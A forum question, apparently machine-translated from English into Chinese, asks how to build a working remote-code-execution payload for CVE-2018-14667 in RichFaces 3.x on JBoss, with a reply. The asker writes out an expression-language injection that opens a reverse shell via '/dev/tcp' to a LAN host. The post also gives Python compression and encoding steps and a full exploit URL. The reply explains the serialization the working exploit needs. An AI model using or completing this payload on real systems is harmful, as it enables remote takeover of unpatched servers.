我目前正在虚拟机JBoss 5.1.0GA+RichFaces 3.X+photoalbum演示上运行,这使我易受CVE-2018-14667的攻击(只能从局域网访问(。我已经测试了中提到的有效载荷https://seclists.org/fulldisclosure/2018/Nov/47而且效果很好。现在,我正试图弄清楚如何生成自己的有效载荷,以便获得反向shell。
以下是我迄今为止为生成自己的有效载荷而找到的信息;
这需要通过zlib:进行压缩
#{request.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("bash -i > /dev/tcp/192.168.2.37/1091 0>&1 2>&1")}
如何使用zlib压缩:
import zlib
import binascii
data = '#{request.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("bash -i > /dev/tcp/192.168.2.37/1091 0>&1 2>&1")}'
compressed_data = zlib.compress(data, 2)
print('Original data: ' + data)
print('Compressed data: ' + binascii.hexlify(compressed_data))
然后,用base64url对压缩后的数据进行编码:
https://simplycalc.com/base64url-encode.php
然后这样测试:
http://192.168.2.37:8181/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/Nzg1ZTQ1OGFjZDBhMDIyMTE0NDY1ZjQ1MGM0MjE3NWQ0NzgzNmEzNmIzNjk1YjliZGVjMGM2Y2I4YzhkNjk4ZDNmMDRkMWJiMjcwNWI1ZjkzODljZjMyZDllMzNkZTMzYzYwNDAzYTZiZGQzMzEzMmZlYzM0M2QwMDZlNzJhNWM4NTZmYTQxNzVkMzQzOGVkMDczODY1OWZlYzE1ZTllNzdmYzQzNDA2YzM2OGM1YmZiN2JlODQwOTk5Y2ZjZTcxYzAwN2Y2OGM5ZTc1MWNjOWNhOTI4ZTA4ODM0NWE0ZmUyNjY0YWI0MDZlNzZhMDYwYmQxNWIyNjkyNTY5YmFhNTI0YWEwZWU1YWYzN2MzYzEzMzg1
不幸的是,每次我收到一个HTTP状态代码500,上面写着:
javax.faces.FacesException:解码资源数据时出错
我整晚都在努力解决这个问题,但没有成功,所以我决定在这里问,也许我可以找到解决我当前问题的方法。
如有任何帮助,我们将不胜感激。
感谢
---更新---
你可以在这里找到一个用Java编写的PoC生成器:
https://pastebin.com/raw/YRKdatWv
1( 将其命名为Main.java2( javac Main.java
不幸的是,我运气不好;
Main.java:1: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagMethodExpression;
^
Main.java:2: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagValueExpression;
^
Main.java:3: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.Location;
^
Main.java:4: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.TagAttribute;
^
Main.java:5: error: package org.ajax4jsf.resource does not exist
import org.ajax4jsf.resource.UserResource;
^
Main.java:6: error: package org.ajax4jsf.util.base64 does not exist
import org.ajax4jsf.util.base64.URL64Codec;
^
Main.java:7: error: package org.jboss.el does not exist
import org.jboss.el.MethodExpressionImpl;
^
Main.java:8: error: package org.jboss.el does not exist
import org.jboss.el.ValueExpressionImpl;
^
Main.java:9: error: package org.jboss.el.parser does not exist
import org.jboss.el.parser.*;
^
Main.java:10: error: package org.jboss.seam.core does not exist
import org.jboss.seam.core.Expressions;
^
Main.java:11: error: package org.richfaces.ui.application does not exist
import org.richfaces.ui.application.StateMethodExpressionWrapper;
^
Main.java:21: error: package javax.el does not exist
import javax.el.MethodExpression;
^
Main.java:22: error: package javax.faces.context does not exist
import javax.faces.context.FacesContext;
^
Main.java:43: error: cannot find symbol
MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
^
symbol: class MethodExpressionImpl
location: class Main
Main.java:43: error: cannot find symbol
MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
^
symbol: class MethodExpressionImpl
location: class Main
Main.java:44: error: cannot find symbol
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:44: error: cannot find symbol
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:44: error: cannot find symbol
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
^
symbol: class MethodExpression
location: class Main
Main.java:45: error: cannot find symbol
StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
^
symbol: class StateMethodExpressionWrapper
location: class Main
Main.java:45: error: cannot find symbol
StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
^
symbol: class StateMethodExpressionWrapper
location: class Main
Main.java:46: error: cannot find symbol
Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
^
symbol: class Location
location: class Main
Main.java:46: error: cannot find symbol
Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
^
symbol: class Location
location: class Main
Main.java:47: error: cannot find symbol
TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:47: error: cannot find symbol
TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:48: error: cannot find symbol
TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
^
symbol: class TagMethodExpression
location: class Main
Main.java:48: error: cannot find symbol
TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
^
symbol: class TagMethodExpression
location: class Main
Main.java:51: error: cannot find symbol
Constructor ct = cls.getDeclaredConstructor(FacesContext.class, Object.class);
^
symbol: class FacesContext
location: class Main
Main.java:59: error: cannot find symbol
TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:59: error: cannot find symbol
TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:60: error: cannot find symbol
ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:60: error: cannot find symbol
ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:61: error: cannot find symbol
TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
^
symbol: class TagValueExpression
location: class Main
Main.java:61: error: cannot find symbol
TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
^
symbol: class TagValueExpression
location: class Main
Main.java:65: error: cannot find symbol
TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:65: error: cannot find symbol
TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:66: error: cannot find symbol
ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:66: error: cannot find symbol
ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:67: error: cannot find symbol
TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
^
symbol: class TagValueExpression
location: class Main
Main.java:67: error: cannot find symbol
TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
^
symbol: class TagValueExpression
location: class Main
Main.java:71: error: package UserResource does not exist
UserResource.UriData uriData = new UserResource.UriData();
^
Main.java:71: error: package UserResource does not exist
UserResource.UriData uriData = new UserResource.UriData();
^
Main.java:103: error: cannot find symbol
byte[] dataArray = URL64Codec.encodeBase64(zipsrc);
^
symbol: variable URL64Codec
location: class Main
42 errors
您需要使用org.ajax4jsf:ajax4jsf、org.jboss.el:jboss-el、org.jboss.seam:jboss-seam、org.richfaces:ui、com.sun.facelets:jsf-facelets以及类路径上的一些可传递依赖项来编译和执行POC生成器。
您的代码段不起作用,因为它不仅仅是应该在有效负载中的Base64编码的EL表达式。相反,您应该使用ObjectOutputStream序列化一个特殊构造的UriData实例,该实例包含EL表达式。有关Java对象序列化的更多信息,请参阅Serializable的Javadoc。
要在Python中模拟这种特殊的Java灭菌,即使不是不可能,也是很困难的。对此,您可以尝试使用javaobj-py3。我不会为它编写实际的代码,这对我来说没有任何练习:(